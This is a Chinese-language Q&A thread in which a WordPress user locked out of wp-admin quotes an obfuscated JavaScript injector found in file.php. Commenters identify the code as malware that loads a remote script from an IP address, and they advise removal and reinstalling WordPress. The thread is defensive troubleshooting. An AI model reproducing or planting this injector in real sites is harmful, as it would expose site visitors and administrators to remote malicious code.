【发布时间】:2019-02-12 22:11:15
【问题描述】:
我的问题是关于 我无法访问我的 WordPress /wp-admin 我得到这个错误
解析错误:file.php 中的语法错误“第 1941 行
我进入这个文件,发现这个命令:
fwrite( $file, "<script type="text/javascript">var _0x2515=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document[_0x2515[5]](_0x2515[4][_0x2515[3]](_0x2515[0])[_0x2515[2]]()[_0x2515[1]](_0x2515[0]));</script></head>\n" );
我找不到问题所在,所以我可以进入我的仪表板 wordpress。
【问题讨论】:
-
看起来很狡猾……也许是恶意的……:/
-
完全删除该行。它在我看来也是恶意软件!
-
我会重新安装 WordPress...备份等,但如果您的数据库是最新的,请下载新版本的 WP,并将 wp-admin 和 wp-includes 替换为新的下载版本。应该解决此问题,因为该文件将被删除并且仅保留实际的 WP 文件,它还将修复任何其他潜在的恶意文件,但值得对您的网站等进行适当的恶意扫描,因为可能会出现更多问题。
-
您发现了一个将
<script src="http://134.249.116.78/jquery.js"></script>注入您的管理 UI 的脚本。该 IP 地址已注册到乌克兰的某个地方。其他 cmets 把它钉牢了。您的计算机已被入侵,建议重新安装整个设置。